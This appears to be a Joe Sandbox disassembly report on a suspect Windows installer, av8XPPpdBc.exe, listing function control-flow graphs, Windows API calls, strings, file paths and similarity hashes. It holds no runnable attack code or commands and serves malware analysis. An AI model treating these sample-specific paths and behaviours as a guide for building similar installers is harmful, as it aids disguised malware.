                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                                                                                                                      • API String ID: 2035342205-2123459697
                                                                                                                                                                                      • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                                                                                                                      • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                                                                                                                      • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                                                                                                                                                      Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 765 4068b4-4068c8 FindFirstFileW 766 4068d5 765->766 767 4068ca-4068d3 FindClose 765->767 768 4068d7-4068d8 766->768 767->768
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nswE27F.tmp, xrefs: 004068B4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 2295610775-1506623398
                                                                                                                                                                                      • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                                                                      • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                                                                                                                      • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                                                                      • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                                                                                                                                                                      Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 202 403fd7-403fe9 203 404150-40415f 202->203 204 403fef-403ff5 202->204 205 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 203->205 206 4041ae-4041c3 203->206 204->203 207 403ffb-404004 204->207 205->206 209 404203-404208 call 404522 206->209 210 4041c5-4041c8 206->210 211 404006-404013 SetWindowPos 207->211 212 404019-404020 207->212 226 40420d-404228 209->226 214 4041ca-4041d5 call 401389 210->214 215 4041fb-4041fd 210->215 211->212 217 404022-40403c ShowWindow 212->217 218 404064-40406a 212->218 214->215 242 4041d7-4041f6 SendMessageW 214->242 215->209 225 4044a3 215->225 219 404042-404055 GetWindowLongW 217->219 220 40413d-40414b call 40453d 217->220 222 404083-404086 218->222 223 40406c-40407e DestroyWindow 218->223 219->220 227 40405b-40405e ShowWindow 219->227 230 4044a5-4044ac 220->230 231 404088-404094 SetWindowLongW 222->231 232 404099-40409f 222->232 229 404480-404486 223->229 225->230 235 404231-404237 226->235 236 40422a-40422c call 40140b 226->236 227->218 229->225 238 404488-40448e 229->238 231->230 232->220 241 4040a5-4040b4 GetDlgItem 232->241 239 404461-40447a DestroyWindow EndDialog 235->239 240 40423d-404248 235->240 236->235 238->225 244 404490-404499 ShowWindow 238->244 239->229 240->239 245 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 240->245 246 4040d3-4040d6 241->246 247 4040b6-4040cd SendMessageW IsWindowEnabled 241->247 242->230 244->225 274 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 245->274 275 40429d-4042a2 245->275 249 4040d8-4040d9 246->249 250 4040db-4040de 246->250 247->225 247->246 252 404109-40410e call 4044af 249->252 253 4040e0-4040e6 250->253 254 4040ec-4040f1 250->254 252->220 257 404127-404137 SendMessageW 253->257 258 4040e8-4040ea 253->258 254->257 259 4040f3-4040f9 254->259 257->220 258->252 260 404110-404119 call 40140b 259->260 261 4040fb-404101 call 40140b 259->261 260->220 271 40411b-404125 260->271 270 404107 261->270 270->252 271->270 278 4042e3-4042e4 274->278 279 4042e6 274->279 275->274 280 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404318-404329 SendMessageW 280->281 282 40432b 280->282 283 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 281->283 282->283 283->226 294 404376-404378 283->294 294->226 295 40437e-404382 294->295 296 4043a1-4043b5 DestroyWindow 295->296 297 404384-40438a 295->297 296->229 299 4043bb-4043e8 CreateDialogParamW 296->299 297->225 298 404390-404396 297->298 298->226 300 40439c 298->300 299->229 301 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->225 301->225 306 404447-40445a ShowWindow call 404522 301->306 308 40445f 306->308 308->229
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00404072
                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                                                                      • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                                                                      • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 121052019-0
                                                                                                                                                                                      • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                                                      • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                                                                                                                      • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                                                                                                                      Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 309 403c29-403c41 call 40694b 312 403c43-403c53 call 40649e 309->312 313 403c55-403c8c call 406425 309->313 322 403caf-403cd8 call 403eff call 405f2e 312->322 317 403ca4-403caa lstrcatW 313->317 318 403c8e-403c9f call 406425 313->318 317->322 318->317 327 403d6a-403d72 call 405f2e 322->327 328 403cde-403ce3 322->328 333 403d80-403da5 LoadImageW 327->333 334 403d74-403d7b call 406594 327->334 328->327 329 403ce9-403d11 call 406425 328->329 329->327 336 403d13-403d17 329->336 338 403e26-403e2e call 40140b 333->338 339 403da7-403dd7 RegisterClassW 333->339 334->333 340 403d29-403d35 lstrlenW 336->340 341 403d19-403d26 call 405e53 336->341 352 403e30-403e33 338->352 353 403e38-403e43 call 403eff 338->353 342 403ef5 339->342 343 403ddd-403e21 SystemParametersInfoW CreateWindowExW 339->343 347 403d37-403d45 lstrcmpiW 340->347 348 403d5d-403d65 call 405e26 call 406557 340->348 341->340 346 403ef7-403efe 342->346 343->338 347->348 351 403d47-403d51 GetFileAttributesW 347->351 348->327 355 403d53-403d55 351->355 356 403d57-403d58 call 405e72 351->356 352->346 362 403e49-403e63 ShowWindow call 4068db 353->362 363 403ecc-403ecd call 4056af 353->363 355->348 355->356 356->348 368 403e65-403e6a call 4068db 362->368 369 403e6f-403e81 GetClassInfoW 362->369 366 403ed2-403ed4 363->366 370 403ed6-403edc 366->370 371 403eee-403ef0 call 40140b 366->371 368->369 374 403e83-403e93 GetClassInfoW RegisterClassW 369->374 375 403e99-403ebc DialogBoxParamW call 40140b 369->375 370->352 376 403ee2-403ee9 call 40140b 370->376 371->342 374->375 379 403ec1-403eca call 403b79 375->379 376->352 379->346
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                        • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                      • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",00008001), ref: 00403CAA
                                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91
                                                                                                                                                                                        • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                      • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                                                                      • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                      • API String ID: 1975747703-1677173953
                                                                                                                                                                                      • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                                                      • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                                                                                                                      Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 403 403205-403208 396->403 404 403258-40325d 396->404 400 403130-403139 call 4034d4 398->400 401 40312e 398->401 408 40325f-403267 call 40301e 400->408 409 40313f-403146 400->409 401->400 406 40320a-403222 call 4034ea call 4034d4 403->406 407 40322c-403256 GlobalAlloc call 4034ea call 4032b9 403->407 404->388 406->404 429 403224-40322a 406->429 407->404 434 403269-40327a 407->434 408->404 413 4031c2-4031c6 409->413 414 403148-40315c call 406002 409->414 418 4031d0-4031d6 413->418 419 4031c8-4031cf call 40301e 413->419 414->418 432 40315e-403165 414->432 425 4031e5-4031ed 418->425 426 4031d8-4031e2 call 406a38 418->426 419->418 425->398 433 4031f3 425->433 426->425 429->404 429->407 432->418 436 403167-40316e 432->436 433->396 437 403282-403287 434->437 438 40327c 434->438 436->418 440 403170-403177 436->440 439 403288-40328e 437->439 438->437 439->439 441 403290-4032ab SetFilePointer call 406002 439->441 440->418 442 403179-403180 440->442 445 4032b0 441->445 442->418 444 403182-4031a2 442->444 444->404 446 4031a8-4031ac 444->446 445->388 447 4031b4-4031bc 446->447 448 4031ae-4031b2 446->448 447->418 449 4031be-4031c0 447->449 448->433 448->447 449->418
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\av8XPPpdBc.exe,00000400), ref: 004030AF
                                                                                                                                                                                        • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                        • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\av8XPPpdBc.exe,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 004030FB
                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\av8XPPpdBc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                      • API String ID: 2803837635-1768121561
                                                                                                                                                                                      • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                                                                      • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                                                                                                                      Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 514 406594-40659d 515 4065b0-4065ca 514->515 516 40659f-4065ae 514->516 517 4065d0-4065dc 515->517 518 4067da-4067e0 515->518 516->515 517->518 519 4065e2-4065e9 517->519 520 4067e6-4067f3 518->520 521 4065ee-4065fb 518->521 519->518 523 4067f5-4067fa call 406557 520->523 524 4067ff-406802 520->524 521->520 522 406601-40660a 521->522 525 406610-406653 522->525 526 4067c7 522->526 523->524 530 406659-406665 525->530 531 40676b-40676f 525->531 528 4067d5-4067d8 526->528 529 4067c9-4067d3 526->529 528->518 529->518 532 406667 530->532 533 40666f-406671 530->533 534 406771-406778 531->534 535 4067a3-4067a7 531->535 532->533 540 406673-406699 call 406425 533->540 541 4066ab-4066ae 533->541 538 406788-406794 call 406557 534->538 539 40677a-406786 call 40649e 534->539 536 4067b7-4067c5 lstrlenW 535->536 537 4067a9-4067b2 call 406594 535->537 536->518 537->536 549 406799-40679f 538->549 539->549 554 406753-406756 540->554 555 40669f-4066a6 call 406594 540->555 543 4066b0-4066bc GetSystemDirectoryW 541->543 544 4066c1-4066c4 541->544 550 40674e-406751 543->550 551 4066d6-4066da 544->551 552 4066c6-4066d2 GetWindowsDirectoryW 544->552 549->536 556 4067a1 549->556 550->554 557 406763-406769 call 406805 550->557 551->550 558 4066dc-4066fa 551->558 552->551 554->557 560 406758-40675e lstrcatW 554->560 555->550 556->557 557->536 562 4066fc-406702 558->562 563 40670e-406726 call 40694b 558->563 560->557 567 40670a-40670c 562->567 571 406728-40673b SHGetPathFromIDListW CoTaskMemFree 563->571 572 40673d-406746 563->572 567->563 569 406748-40674c 567->569 569->550 571->569 571->572 572->558 572->569
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 004066CC
                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 0040675E
                                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,762323A0), ref: 004067B8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                      • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
                                                                                                                                                                                      • API String ID: 4024019347-2831730964
                                                                                                                                                                                      • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                                                      • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
